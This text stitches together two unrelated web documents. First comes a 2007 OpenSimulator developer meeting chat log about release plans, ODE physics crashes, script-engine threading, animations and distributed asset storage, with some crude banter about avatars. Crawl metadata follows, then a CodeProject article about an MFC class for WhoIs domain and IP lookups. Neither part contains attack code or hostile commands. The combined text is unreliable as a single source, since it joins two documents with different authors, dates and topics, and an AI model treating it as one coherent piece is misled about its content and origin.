Charles Krinkeb: sdague, mw. I would like to adopt this, but have some issues with modifying the users table. I dont want to make it incompatible with OpenSim on OSGrid. [10:43] Wright Juran: of course though I am for 0.5 being a big release, the problem with big releases in a open source project are that when there are busy months for the developers (on non project releated things) it does effect the release more than if it was a small feature release [10:43] Neas Bade: I think the top 10 bug list is definitely a good thing [10:43] Sakai openlifegrid: perhaps an intermediate release is more appropriate? [10:44] Sakai openlifegrid: drawing on ur 0.4.x idea [10:44] Nebadon Izumi: Does anyone think that adding fields to the user table have any adverse effects on grid mode functionality? [10:44] Neas Bade: Charles, I think perhaps it would be good to email out the top 10 bug list to the mailing list o na weekly basis [10:44] danx danx0r: are we agreed that ODE goal is no more ugly crashes? [10:44] You: cfk... if you can send me the table defs, I can have a look at updating the table layout [10:44] Neas Bade: danx0r I agreed [10:44] Nebadon Izumi: i personally dont see how it could effect it but would like others opinions [10:44] danx danx0r: as opposed to focusing on niceties like not bouncing 500 meters [10:44] You: yes [10:44] paulie Femto: yep [10:44] Sakai openlifegrid: :) [10:44] danx danx0r: ok I may put in hax to basically reset physics if I get that exception [10:44] You: crashing is worse than things not working right [10:44] Nebadon Izumi: Tleiades maybe you can just download the opensimwi [10:44] Charles Krinkeb: done, Neas. Next subject, I will put my concerns about adopting opensimwi on the mailing list also. I need some technical guidance before I modify the users table. [10:45] Nebadon Izumi: and have a look [10:45] danx danx0r: so instead of crashing it will just zero velocities and make positions sane [10:45] Sakai openlifegrid: def [10:45] Neas Bade: I think the problem with 0.4.x releases is "what have we done that provides incremental benefit to 0.4 that's as reliable as the features in 0.4" [10:45] You: ok [10:45] danx danx0r: I remember why I didn't do it before: this is a C++ hack [10:45] Neas Bade: 0.4 was very solid for what it supported [10:45] Sakai openlifegrid: well what would be your targets for a 0.4.x? [10:45] Sakai openlifegrid: over a 0.5? [10:46] Neas Bade: danx0r how can I help on the physics debug front? [10:46] Wright Juran: yeah true, if we did 0.4.X releases they really would be peacemeal 0.5 releases rather than mantiance releases on 0,4 [10:46] Sakai openlifegrid: ie. stable ODE etc =0.4.x then 0.5 inv assets grid?> [10:46] Neas Bade: let's not worry about releases per say over the next month and just push on hard on the grid and physics stability fronts [10:46] You: yes, I think we agreed not to invest too heavily in branching in svn [10:46] Wright Juran: agreed [10:47] Neas Bade: sakai, I don't think you could back port what we have really [10:47] Sakai openlifegrid: ok [10:47] Neas Bade: face, it, I'm the one that beat everyone up a lot to get 0.4 out the door :) [10:47] danx danx0r: neas - issue is this means we are forking ODE [10:47] Neas Bade: so if I see everyone getting complacient, I'll start beating up again :) [10:48] Sakai openlifegrid: ;) [10:48] Nebadon Izumi: hehe [10:48] Wright Juran: I think most people still run from svn version anyway so releases aren't so much a issue just yet, and we have the nightly builds [10:48] danx danx0r: since we need to change ODE's exception handling logic [10:48] Neas Bade: ok [10:48] Sakai openlifegrid: true we only use ur svn;s [10:48] danx danx0r: I'm OK with that, I think it's enevitable whichever engine is used [10:48] Neas Bade: well, do you think that is more or less sensible than digging on bullet? [10:48] danx danx0r: just means have to merge if we want new ODE versions [10:49] Wright Juran: how far is Bullet from being up to ODE level ? [10:49] danx danx0r: neas -- I think it's sensible to get ODE stable, then move to bullet after 0.5 [10:49] Wright Juran: ah ok [10:49] danx danx0r: Wright -- it needs quite a bit of work [10:49] Nebadon Izumi: i dont think its even close [10:49] Nebadon Izumi: bullet is very unstable [10:49] danx danx0r: and we need to detangle some things from the ODE plugin [10:49] Neas Bade: ok, so probably we'll want to create a sepereate opensim-ode repo [10:49] danx danx0r: I've also seen bullet eat up ALOT of cpu [10:49] Sakai openlifegrid shudders [10:49] danx danx0r: and ODE so far has seemed surprisingly light on CPU from what I've heard [10:49] Neas Bade: ok, fair enough [10:50] Sakai openlifegrid: I could do some comparisons if you like [10:50] Neas Bade considers danx0r the physics master [10:50] danx danx0r: I agree long-term bullet looks good, but it's new -- almost no docs [10:50] danx danx0r: and despite our issues, I suspect ODE is more stable due to maturity [10:50] Sakai openlifegrid: (physical) [10:50] Wright Juran: are we still going with c# bullet or as I saw danx suggest before, a wrapper on c/c++ Bullet? [10:50] danx danx0r: and BTW there is still active ODE developers -- note they moved from 0.8 to 0.9 in a few months [10:50] Neas Bade: ok, good to knwo [10:51] danx danx0r: and finally, it's simply the case that I'm very familiar with ODE and not with Bullet [10:51] Neas Bade: so presumably we'd start with 0.9, and modify the exception handling? [10:51] danx danx0r: and so far new physics coders have not stepped up to fulltime involvement [10:51] danx danx0r: tho gerard is doing excellent work on meshing prims [10:51] Wright Juran: yeah so sticking with ODE seems the best (as you are doing most of the work, think we should stick with whatever you think) [10:52] danx danx0r: neas - yes, since ODE is now in opensim-libs, I feel comfy hacking on it [10:52] Neas Bade: ok, sounds good [10:52] Tleiades Hax has confidence in danx0r's work [10:52] danx danx0r: only thing is when it gets hacked, we have to update binaries in opensim/bin [10:52] danx danx0r: agreed then. I may be quiet for a bit, stressful workday [10:52] Neas Bade: I'll probably bug you a bit more on IRC about getting up to speed on physics so I can help there [10:52] danx danx0r: neas -- great, later this aft will be better [10:53] danx danx0r: boss is right here, wondering why I'm complaining he blocks UDP ports [10:53] Nebadon Izumi: lol [10:53] danx danx0r: btw corporate firewalls -- opensim shuld be better than LL [10:53] Neas Bade: yep, probably tomorrow actually, as I have municipal wireless meeting in RL after this [10:53] danx danx0r: we should have TCP connect, check for UDP/ports [10:53] danx danx0r: like video streamers do [10:53] Wright Juran: tell him that opensim is a great robot simulator enviorment (or will be) [10:53] danx danx0r: maybe a TCP backstop? [10:53] Neas Bade: 4 SL meetings and 1 RL meeting in one day makes for little real work :) [10:53] danx danx0r: well it does help me with physics, which I use on the job [10:53] danx danx0r: but it's a tentative argument at best [10:54] danx danx0r: any comments from you net wizards on TCP/firewalls? [10:54] You: I think we are limited by the viewer [10:54] Neas Bade: danx0r I think that we'll get a bunch of that as the Linden environment evolves [10:54] Sakai openlifegrid: we haven't run into any issues with the opensim [10:54] Neas Bade: yeh, it's view issues right now [10:54] You: I think all opensim code uses tcp [10:54] danx danx0r: d'oh of course it's a client-side issue [10:55] danx danx0r: 'nother reason for our own client... [10:55] Neas Bade: from all the Linden talk that I've heard, the viewer will be able to opperate in TCP mode in a years time [10:55] You: though I have been thinking that the current inter region protocol is in efficient [10:56] Wright Juran: yeah, custom client ++. Think sooner or later someone will start work on one (even if we don't) [10:56] Sakai openlifegrid: I've opnly seen small hacks on the LL Client [10:56] Neas Bade: I've always been -- on custom client, as I think we gain a lot from compatibility :) [10:56] You: ++ on sean's comment [10:57] You: we live on the ll viewer [10:57] Neas Bade: at least until we're a bit further on the back end implementation [10:57] Wright Juran: Tleiades, I think all our inter-X protocols are inefficient, thats what I mean by thinking we need to do major work on the protocols [10:57] Neas Bade: that would be a good ML discussion [10:58] Wright Juran: yeah but there are a lot of things that the LL viewer is no right for, a lot of things don't need all the bloat in it for example [10:58] Neas Bade: silly flying people [10:58] Nebadon Izumi: hey tedd [10:58] Neas Bade: ah, it's tedd [10:58] Neas Bade: hey tedd [10:58] Sakai openlifegrid: is hipihi based on the LL client? [10:58] Nebadon Izumi: ted [10:58] Nebadon Izumi: carefull man [10:58] Neas Bade: hwo is the script engine coming? [10:59] Nebadon Izumi: your gonna crash the server [10:59] Wright Juran: so while yes I don't think we should stop being compatiable with the SL viewer, I do think having a custom client that uses the same protocol would be good [10:59] Nebadon Izumi: just leave it tedd [10:59] Tedd Maa: just checking ;) [10:59] Nebadon Izumi: not during meetings please [10:59] Neas Bade: yeh, we had one crash earlier, so trying to not upset things too much :) [11:00] Tedd Maa: server crashes when you move object? [11:00] Tedd Maa: hmm... I didn't know that :) [11:00] Charles Krinkeb: Tedd, sometimes. [11:00] Nebadon Izumi: ode collisons [11:00] Wright Juran: yeah Tedd, just get on with your excersises, if you come to gym class, you have to work [11:00] Neas Bade: hehehe [11:00] Tedd Maa: ok, so I admit it, I'm the master SL griefer [11:00] Neas Bade: so, Tedd, how goes the script engine work? [11:00] Charles Krinkeb: Ref: 333Mbyte, 67% CPU, 13 avatars [11:01] Sakai openlifegrid: ouch [11:01] Nebadon Izumi: nice charles [11:01] Neas Bade: sakai, remember, there is like 0 optimization yet [11:01] Nebadon Izumi: 67% seems high [11:01] Charles Krinkeb: I suspect the 67% has more to do with locks then anything else. [11:01] Sakai openlifegrid: yes it dows [11:01] Sakai openlifegrid: does [11:01] Tedd Maa: well, it kinda stopped last week again ... temporarily. The good news is that I'm able to participate on IRC and write some code now and then [11:01] Nahona Nakamori: mmm... about scripting... somebody heavy in lsl scripting already thinked to attempt to make a prims rezzer for LL grid using xml export from opensim? could be fun to can use opensim in sandbox for offline building... [11:02] Tedd Maa: as compared to a few weeks/a month ago when I only had time to do some scetch-book planning [11:02] Sakai openlifegrid: true [11:02] Charles Krinkeb: Nahona: Mantis feature request would be best for this, I believe. [11:02] Neas Bade: cool [11:02] Sakai openlifegrid: I know someone I can ask [11:02] Neas Bade: does anyone know how I can get mantis to send me email on changes to anything, like it says it is doing? [11:02] Neas Bade: but isn't [11:02] Tedd Maa: Current status is: I have implemented TCP server/client. I am designing a binary protocol and have sort of started implementing what I call the "Packet factory" (the class that makes the binary packets) [11:03] lmmz say, nice [11:03] Tedd Maa: I have created a separate stand-alone for script engine called script server and moved (copied) ScriptEngine to it. [11:03] Neas Bade: cool [11:03] Wright Juran: Neas, it used to send updates if a issue was assigned to you, but don't think it has done that for months now [11:03] Tedd Maa: But because ScriptEngine needs scene and the comm is not operational yet it will not compile [11:03] Neas Bade: any best guess on when it might go into tree? [11:04] Tedd Maa: in fact there are a lot of things that will not compile [11:04] Tedd Maa: its at least 2-3 weeks depending on my spare time [11:04] Neas Bade: Wright: that's sort of problematic [11:04] Tedd Maa: OpenSim has first priority on my spare time activites [11:04] Neas Bade: cfk, any chance you can beat up openmv folks on that front? [11:05] Neas Bade: cool :) [11:05] Charles Krinkeb: Huh? What front, sorry [11:05] Neas Bade: mantis not sending email [11:05] Tedd Maa: I have started talking to Babbage, he seems interested in the new Script Engine approach [11:05] Charles Krinkeb: Sure. CPrior is my contact, I will see what I can do [11:05] Neas Bade: nifty [11:05] Tedd Maa: he also says we should not attempt implementing microthreading [11:06] Tedd Maa: and I have been thinking a lot about it and I agree ... there are so many problems that we should not start it, it is just dead wrong from a design perspecitve [11:06] You: Tedd.. I have a question, are you using interpreted code or CIL? [11:06] danx0r say, is my av still there? battery died [11:06] Neas Bade: that's definitely progress [11:06] Wright Juran: haven't they implemented microthreading in their mono implementation? [11:06] Charles Krinkeb: Cprior-gram sent re Mantis-non-mail. [11:07] Tedd Maa: right now I am using C# for everything, I was using CIL on the LSL ByteCode [11:07] You: well... two things [11:07] Tedd Maa: If I can speak on a purely personal level.. I think we'll find that LL will not implement C# ... [11:07] You: 1) won't injecting thread.sleep and threadpools be just as good as microthreading? [11:07] Neas Bade: right, I think we'll still need the LSL implementation [11:08] You: and .. what about security, CAS doesn't work on mono [11:08] Neas Bade: I think there was confusion over them adding Mono [11:08] Neas Bade: vs. C# [11:08] Charles Krinkeb: I might have to boogie, but will do the chat log onto the wiki later. [11:09] Sakai openlifegrid: Ciao Charles [11:09] You: bye cfk [11:09] Neas Bade: Tedd, presumably the new script engine doesn't preclude using LSL like the current model? [11:09] lmmz say, cya [11:09] Wright Juran: yeah I'm going to have to go too, will stay logged in , but not really here [11:09] Neas Bade: later cfk [11:09] Tedd Maa: Answers: 1) Then we can not move running scripts between servers or pack them into inventory. BUT, with new ScriptServer we can at least have script moved between regions... then next problem is that you can only have a few hundred threads per operating system [11:09] Tedd Maa: or, per computer [11:09] Charles Krinkeb: 14 avs, 68% CPU, 340Mbyte [11:10] Tedd Maa: Security is a big problem... it is THE reason why I think we will not see C# and Mono in SL for a long time [11:10] danx0r say, why is it so hard to sandbox mono code? [11:10] danx0r say, isn't that the whole point of a managed bytecode? [11:11] Tedd Maa: The technical side with microthreading can be solved with a lot of work, although its one of those "its possible in theory but nobody would ever be so mad as to actually ytry it" implementations [11:11] You: danx0r it gets jitted [11:11] You: but what about mint? [11:11] Tedd Maa: It would be easier to implement a virtual machine with a minimal OS that can run Mono and run scripts inside it instead with 1 thread per OS [11:11] danx0r say, so tedd -- you have a thread for every script now? Doesn't LL do some sort of smart sleep() injection [11:11] Tedd Maa: *1 thread per script [11:11] danx0r say, ahh, frakkin JIT [11:12] danx0r say, well it must be hard, because Guido punted on it in Python, and he doesn't even use JIT [11:12] danx0r say, he just pulled the module and said you're all on your own, I absolve myself of any and all liability for security problems [11:12] Tedd Maa: one can in theory microthread Mono, and it might be that LL already has done that ... but the security aspect of it is just impossible [11:12] danx0r say, 1 thread per script is not scalable, ne? [11:13] danx0r say, there's microthreads for python sorta, but I'm talking about trusted execution [11:13] Tedd Maa: no, 1 script per thread won't work... operating systems have a big overhead for each thread [11:13] danx0r say, I guess these issues intersect [11:13] Sakai openlifegrid: it's kill a bit of hardware [11:13] danx0r say, I remember something from LL about smart yield() injection [11:13] Tedd Maa: I'm thinking of looking into JavaScript [11:13] Neas Bade: I wonder how many mono threads you can have on linux before things get wonky [11:14] danx0r say, which is a form of microthreading, morally speaking [11:14] Neas Bade: tedd, do you have a good test case to test practical limits? [11:14] Tedd Maa: Babbage tested that, a few hundred on Linux and close to a hundred on Win [11:15] Tedd Maa: but Windows NT has something called "fibres", but I think maybe the app has to support it somehow [11:15] You: threads have almost the same overhead as processes [11:15] Neas Bade: not on linux [11:15] Tedd Maa: I've been looking at yield, but I'm not sure if we should go down that path at all [11:15] danx0r say, yield() seems like the right thing [11:16] danx0r say, I did something on Python where I just inserted a yield after every line of code [11:16] danx0r say, wasn't scaled up, but it could have been I think [11:16] danx0r say, the idea is to insert a yield anywhere you have a CPU capture [11:16] Neas Bade: yield actually causes some interesting issues with the os schedulars from my previous experience [11:16] danx0r say, it's part of the theory of continuations [11:17] danx0r say, neas -- it doesn't have to be an OS yield [11:17] Neas Bade: anyway, I've got to run to this wireless meeting [11:17] Neas Bade: see you all later [11:17] Neas Bade: thanks for so many people showing u [11:17] Neas Bade: up [11:17] danx0r say, sorry I need to be more specific. Yield() in python is a python thing, it returns control to the VM [11:17] Sakai openlifegrid: Ciao Neas thanx [11:17] lmmz say, cya! [11:17] Tedd Maa: well, IF Linux can support say 500 threads ... this means we can have 500 scripts with loops in them. or we could have 499 scripts with loops and 10.000 scripts without loops [11:17] danx0r say, antont: that sucks -- wonder why [11:17] Tedd Maa: if you see my point [11:18] Neas Bade: well, that might be a fine place to start [11:18] danx0r say, so mono doesn't have a microthreading capability or python-like yield() next() ?? [11:18] Neas Bade: its 500x better than where we are now :) [11:18] Tedd Maa: and with remote script server we can cluster multiple script servers to serve one region, meaning we can without any big problem run 10k's of scripts [11:18] danx0r say, if so that's too bad. I guess python is strictly runtime interpreted so it's easier [11:18] Tedd Maa: mono has yield(), but there are problems ... [11:18] Neas Bade: and 20x slower [11:19] sdague say, �ACTION goes poof� [11:19] Tedd Maa: 01 41 43 54 49 4F 4E 20 73 61 79 73 20 73 6F 6D .ACTION says som 65 74 68 69 6E 67 20 6F 6E 20 49 52 43 01 00 ething on IRC.. [11:19] Tedd Maa: wow [11:19] Tedd Maa: what happened there? :P [11:19] Nebadon Izumi: lol [11:20] Sakai openlifegrid: Mono microthreading only works with the subset of CIL > assembler opcodes that the LSL to CIL compiler emits [11:20] You: tedd.. wouldn't threadpooling work? [11:20] Tedd Maa: point is that there are a lot of small obstacles to overcome to implement Mono microthreading, some are of those that can be overcome, while others are not [11:21] Blue Mouse: couple questions about other topics??? [11:21] Tedd Maa: "open up everything, allow anyone to run any .Net app on my computer. Now try to restrict the application." <- its just the wrong way to go [11:22] Nebadon Izumi: whats your questions blue? [11:22] Blue Mouse: what needs to be done to make animations work? [11:22] Tedd Maa: threadpooling can work to some degree now that we have script server as stand alone, but when its integrated into OpenSim its very dangerous [11:22] You: why not have it as a standalone server? [11:23] Sakai openlifegrid: well that would def be a good point from a hardware pool side [11:23] Tedd Maa: it will be, but threadpool works as "if you are kind enough to lend me back my thread so I can continue execution" [11:23] Gareth say, ooh, Wright Plaza is back up? [11:23] lmmz say, Blue: the last thing I heard was that we need someone to make opensource versions of the LL animations? Is that wrong? [11:23] Tedd Maa: that is not so cool :) [11:23] Nebadon Izumi: yes gareth it was only down for about 1 minute [11:24] Gareth say, i picked the wrong minute [11:24] You: which is where emitting thread.slepp(0) comes into play [11:24] Blue Mouse: there were a bunch of animations packaged with avimator [11:24] Gareth say, heh [11:24] Nebadon Izumi: ah thats not so hard [11:24] Gareth say, i'll hop on [11:24] You: similar to the yield() [11:24] lmmz say, Blue: someone was looking into the "sit" today. [11:24] Blue Mouse: can't remember what the license was... [11:24] Blue Mouse: sit would be a good starting point [11:24] Sakai openlifegrid: yeah i've got afew bucket fulls of animations too [11:24] Nebadon Izumi: chillken was working on sit [11:25] You: BSD license is important [11:25] lmmz say, I recall reading in backscroll on #opensim-dev that sit was being looked into. [11:25] Nebadon Izumi: yea lmmz it was chi11ken [11:25] Sakai openlifegrid: hehe irc delat [11:25] Sakai openlifegrid: delay [11:25] lmmz say, I dont know if the animations are part of the client or are downloaded from LL. [11:25] Tedd Maa: in initial implementation of script engine we will have thread based execution of scripts. It is not a 1:1 ratio between thread and script. If the script is not working then no thread is assigned to it. [11:25] Nebadon Izumi: they are an asset [11:25] Nebadon Izumi: i beleive [11:25] Tedd Maa: so if you have 10.000 scripts waiting for an event then no threads are in use. [11:25] Nebadon Izumi: not in client [11:26] Blue Mouse: asset yes, but i thought they were executed on the client [11:26] lmmz say, the client contains an xml file with keys to LL animations, but I imagine we dont want to use LL's animations. :) [11:26] Blue Mouse: haven't looked into it too deeply thought [11:27] Blue Mouse: are the animations on the client? can we just send the right keys? [11:27] Blue Mouse: isn't that how walk works now? [11:27] Nebadon Izumi: no [11:27] Nebadon Izumi: its a animation [11:27] Nebadon Izumi: an asset [11:27] lmmz say, I dont think they're on the client unless youve downloaded em from LL grid. [11:27] Nebadon Izumi: animations are not in the client [11:27] Gareth Nelson shouts: where abouts are you all? [11:28] Nebadon Izumi shouts: upstairs in the building Gareth [11:28] lmmz say, I've seen some custom animations play locally in OpenSim, but they dont play inworld, yet. [11:28] You shout: upstairs [11:28] Gareth Nelson: this looks like a crazy cult meeting [11:28] You: one more thing to put on the list :) [11:28] Gareth Nelson: it's like smith in the matrix, but ruth [11:28] lmmz say, hopefully, chillken (?) will make som eprogress on it, today. :) [11:28] Blue Mouse: correct... there are three animations in opensim right now... hard coded case statement for walk, fly and something else [11:29] Blue Mouse: ok [11:29] lmmz say, walk, fly and gym class? [11:29] Blue Mouse: something like stop flying but i can't remember [11:29] Nebadon Izumi: yea in the Data folder [11:30] Nebadon Izumi: there is an xml file [11:30] Nebadon Izumi: that defines the animations [11:30] Nebadon Izumi: and their asset UUID [11:30] lmmz say, Blue, chi11ken is probably the one to work with on animations. [11:30] Blue Mouse: will do [11:30] Gareth Nelson: are people seeing my shape changes? [11:30] You: great .. I'd love to see more animations [11:30] You: dsaf [11:30] You: great .. I'd love to see more animations [11:30] Sakai openlifegrid: a busty woman? [11:30] lmmz say, Gareth, yes. Nice headlights. [11:31] Nebadon Izumi: rofl [11:31] Nebadon Izumi: i got a screenshot [11:31] Nebadon Izumi: thats going on the wiki [11:31] Gareth Nelson: my sexy av? [11:31] Nebadon Izumi: lol [11:31] Sakai openlifegrid: u can currently accept animations direct from avimator? [11:31] Gareth Nelson: amongst you mere mortal ruths [11:32] Gareth Nelson: why are animations hardcoded? [11:32] Nebadon Izumi: yea one problem is animations in your inventory [11:32] Nebadon Izumi: only you can see them [11:32] Nebadon Izumi: it doesnt animate to world [11:32] Blue Mouse: i can put animations in my library (from avimator) [11:32] Blue Mouse: i can even play them locally [11:32] Blue Mouse: can't play them in world though [11:32] Nebadon Izumi: yea only works locally [11:32] lmmz say, Sakai, I think so, yes. But without an asset system, they would not stay in inventory. And they only play locally. [11:32] Nebadon Izumi: yea [11:32] You: assets isn't implemented fully and completely [11:32] Sakai openlifegrid: lol - so true [11:32] Nebadon Izumi: yea that should be done 1st [11:33] Nebadon Izumi: before doing to much with animations [11:33] Sakai openlifegrid: I think I'll contact ch11ken then I have a ton he can have straight up [11:33] You: first the infrastructure for assets and inventory needs to be set up [11:33] lmmz say, Sakai, nice. [11:33] Sakai openlifegrid: my borther has made 100's for SL [11:33] Nebadon Izumi: but you should talk with him [11:33] Nebadon Izumi: as assets is not far off [11:33] Nebadon Izumi: few weeks [11:33] Sakai openlifegrid: well that's exciting [11:34] lmmz say, I suppose we get to decide how assets are persisted between grids, after that. :) [11:34] Blue Mouse: speaking of assets... any idea when i can put textures in a prim? (looking to build a projector for biz meetings) [11:34] Gareth Nelson: the viewer fetches assets over HTTP now - does anyone know how to provide them? [11:34] Tedd Maa: ok, I'll be on IRC .. need to do some more work :) [11:34] lmmz say, Cya, tedd! [11:35] Tedd Maa: you all have a nice workout [11:35] Sakai openlifegrid: yes persistent between grids would be impressive but could really dig the bandwidth [11:35] Sakai openlifegrid: Gareth going for hot nurse? [11:36] You: well, I have been thinking about writing a client side asset and inventory storage engine [11:36] You: that way, the inventory and assets could follow the user between grids [11:36] Sakai openlifegrid: but [11:36] lmmz say, I Gotta run! Great meeting! The IRC bridge is the shiz! [11:36] Sakai openlifegrid: how would you get around duplicate asset entries? [11:37] You: I wouldn't and I wouldn't care, as long as they have the same I'd :-) [11:37] Sakai openlifegrid: hehe [11:37] Stefan Andersson: I'd suggest we look into URI instead of LLUUID for resources [11:37] Gareth Nelson: i now pwn all you ruths! [11:38] Nebadon Izumi: lol [11:38] Gareth Nelson: so..... HTTP textures at the very least works direct to viewer [11:38] Gareth Nelson: anyone know the details on that? [11:38] Gareth Nelson: and can the sim FORCE the viewer to take them? [11:38] Sakai openlifegrid: well that would be aboon [11:38] You: Stefan .. that is the obvious choice.. but it won't fit with the viewer [11:38] You: but ... [11:38] You: Stefan .. that is the obvious choice.. but it won't fit with the viewer [11:38] You: I have been thinking [11:39] You: since the asset server will be rest [11:39] Stefan Andersson: No, but rather than rewriting a whole client-side asset system, I'd say the effort would be better spent trying to hax URI [11:39] You: and lsl supports http [11:39] You: we could implement some extensions [11:39] Sakai openlifegrid: this may be easier [11:39] You: which could be accessed using lsl [11:40] You: url's for assets really is the obvious choice [11:40] You: we know the internet is a scalable storage device :) [11:41] Sakai openlifegrid: most certainly... [11:42] Sakai openlifegrid: could you possiblly translate a uuid to a url and pass it through [11:42] Sakai openlifegrid: ? [11:42] Stefan Andersson: I'm pretty sure it would be possible to create a asset guid-to-uri conversion scheme. [11:42] You: now if only we could get some people who understood grid computing to look at simulator code [11:42] You: yes [11:42] You: and the mapping could be tweaked by lsl using a rest interface [11:42] Testc User: there are existing uuid uri schemes (well i know one) [11:43] Stefan Andersson: Also, you have this thing with the assets going thru the simulator, which is authenticated [11:43] You: I'm not too hot on the concept of "authenticated users" for the final release [11:43] Stefan Andersson: If every object had a 'namespace' uri attached to it, you'd just attech the asset guid to that [11:44] Sakai openlifegrid: rfc4122 [11:44] Sakai openlifegrid: (uuid to uri) [11:45] Gareth Nelson: The concept of authenticated users is a must Tleiades: i am hot on the idea of authenticating users or allowing guests [11:45] Gareth Nelson: i'm VERY hot on guests [11:45] You: I think the HTTP approach is better [11:45] Gareth Nelson: i'm also hotter than all of you! [11:45] You: lols [11:46] Gareth Nelson: Tleiades: were you referring to authenticating users for asset downloading? [11:46] Gareth Nelson: or for login and authentication against a DB for standalone mode? [11:46] You: yes, and accessing regions [11:46] Blue Mouse: if the client grabs the asset using a URL and HTTP then authentication could bypass the simulator altogether [11:46] You: anonymous access is important I think [11:46] Gareth say, heh, you can't see it but my avatar there is the sexiest one [11:46] Blue Mouse: that could be good (simulator doesn't have to proxy client credentials) [11:47] lbsa71 say, Well, if we wanted distributed assets, we could do them quite easy today, I guess; [11:47] Blue Mouse: and bad (what if you aren't allowed to get an asset you need) [11:47] Gareth Nelson: authentication for assets should be done using either CAPs direct to viewer or proxied via the sim [11:47] You: I worry about the asset server [11:47] You: I don't think a single central asset server is going to cut it [11:47] Nahona Nakamori: are you sure Gareth? [11:47] Nahona Nakamori: lol [11:47] Gareth Nelson: question - why not do it the way it's being proposed on the SL wiki for the AW Groupies? [11:48] lbsa71 say, If all users had an 'home root url' then all assets could be funneled to that. [11:48] Gareth Nelson: in fact, are any other groupies here? [11:48] Stefan Andersson: Ok, gotta go. [11:48] You: I gave up on the AWG [11:48] Stefan Andersson: Cheers [11:48] Gareth Nelson: ok, Nahona has a mildly better face.... [11:48] Gareth Nelson: Tleiades: the AWG is getting too beuracratic for my liking [11:48] Sakai openlifegrid: i would agree on the single asset server [11:49] Nahona Nakamori: Nahona uploaded her personal realistic skin *lol* [11:49] You: yeah .. should get coding on the rest client [11:49] Gareth Nelson: but some good ideas have been generated [11:49] Gareth Nelson: i'll discuss the details on IRC rather than here (laggy as a laggy lagfest) [11:49] You: yes.. I just think that most of the talk was too high level, and of very little practical use [11:49] Sakai openlifegrid: I have to say thank you to everyone for your warm welcome [11:49] Sakai openlifegrid: I must sleep [11:50] You: and opensim is very much about pratical approaches [11:50] Gareth Nelson: but basically the agent domain stores all an agent's belongings, region domain stores all the rez'ed objects [11:50] Gareth Nelson: Tleiades: agile :) [11:50] Gareth Nelson: and inventory can come from an aggreator [11:50] Nahona Nakamori: night Sakai [11:50] You: nite [11:50] Sakai openlifegrid: nite [11:50] Gareth Nelson: at login the user gets a big list of inventory sources, every asset is a link to where the asset can be downloaded [11:51] You: Gareth .. we have to live with the viewer .. as it is today [11:51] You: but I think cap's can be used to distribute load [11:51] Gareth Nelson: hmm yeah - not an option to alter anything viewer side in opensim [11:51] Gareth Nelson: the sim can still act as a proxy and do most of the new architecture though [11:52] You: yes.. that is my thinking [11:52] You: my thinking is like this [11:52] Gareth Nelson: brb - keep talking [11:52] Gareth Nelson: and stop staring at my breasts Nahona ;) [11:52] You: the viewer is directed to the url of the assets [11:52] Rookiie Roux: lol [11:52] Nahona Nakamori: arf [11:52] Rookiie Roux: gareth [11:52] You: and is basically told to look at 127.0.0.1 [11:53] You: where we have a client side component, transfer the asset [11:53] Blue Mouse: umm... how about just running a sim on every client that represents "home" territory [11:53] Blue Mouse: then proxy other requests through that sim [11:53] You: if the asset isn't found at the clientside asset server, the client side asset server goes to the network at dl it [11:54] Nahona Nakamori: not my fault Gareth if all ruth breasts are not so much hot *lol* [11:54] Nebadon Izumi: lol [11:57] Tedd say, I'm kinda glad animations haven't been implemented yet or you'd be having an orgie right about now [11:57] Tedd say, but hey, words can be just as exciting, right? ;) [11:57] You: does anybody have the full log of the meeting? [11:58] Nebadon Izumi: IRC does [11:58] Tedd say, I came late, but I do log [11:58] Nebadon Izumi: we can remove all the nonsense [11:58] Nebadon Izumi: hang on [11:58] Nebadon Izumi: i'll hook it up [11:58] You: I lost mine at the crash [11:59] You: Neb... will you post the log on the wiki? [11:59] Nahona Nakamori: rofl tedd, yeah sure and in my viewer i read (Mature) at the Menu bar, so NO PROBLEM lol
http://opensimulator.org/index.php?title=Chat_log_from_the_meeting_on_2007-10-23&oldid=1236
CC-MAIN-2021-04
refinedweb
8,462
66.81
This is a simple MFC class for Internet-based WhoIs processing. WhoIs is an internet function to determine information about specific IP addresses and domain names. A number of companies, such as NetworkSolutions and Internic, keep WHOIS databases online at all times. While many freeware applications exist to display this data, there is little information or code available that actually does it. Many applications need access to this information, and this class provides a simple way to query these databases. The code to use this class to access this information would look like the following: // Create class instance CWhoIsClass whoIs; // Set address to be queried CString szAddress = "Microsoft.com"; // Call actual function CString szResult = whoIs.WhoIs(szAddress); There are only two public functions for the class: CString WhoIs(LPCSTR szAddress); void SetWhoIsServer(LPCSTR szServerName); The first is used to obtain the WhoIs information. The data is returned as a string that is typically a few hundred characters. The second is used to change WhoIs servers. The program defaults to the whois.internic.net server. You can change it to whatever whois server best fits your needs. The Internic and Network Solutions servers host mostly US sites. Other servers exist to handle military address and international addresses. You should probably expect to query two or more servers to obtain the best information. When querying a whois server, you can request either domain name information (eg. microsoft.com) or IP address information (eg. 216.98.67.204). For example, the following would be valid address queries: whois("microsoft.com") whois("codedeveloper.com") but whois("") would be an invalid query request. Most whois servers appear to accept the domain portion (minus the "www." part) and return valid information. The query syntax for IP address requests varies by whois server The whois.internic.net server accepts pure IP address queries. The whois.networksolutions.com server however requires that the word "host" preceed the IP portion. If you use the network solutions whois server, which sometimes returns more complete information, your queries would have to take the following form: whois(host 216.98.67.204) If the "host" part is missing, no data will be returned with using the whois.networksolutions.com server. Using the code in your project also requires you include the source and header files for the CWhoIsClass. This would usually look like this: #include "WhoIsClass.h" #include "WhoIsClass.cpp" The code was compiled with VC++ 6.0, but should work with earlier versions as well. It uses MFC sockets for processing, and therefore requires a AfxSocketInit() call prior to class use. It assumes a connection to the Internet already exists. That's it. Not very complicated, but it solved my problem. Perhaps it will help others as well. General News Question Answer Joke Rant Admin
http://www.codeproject.com/KB/IP/whois.aspx
crawl-002
refinedweb
464
59.19
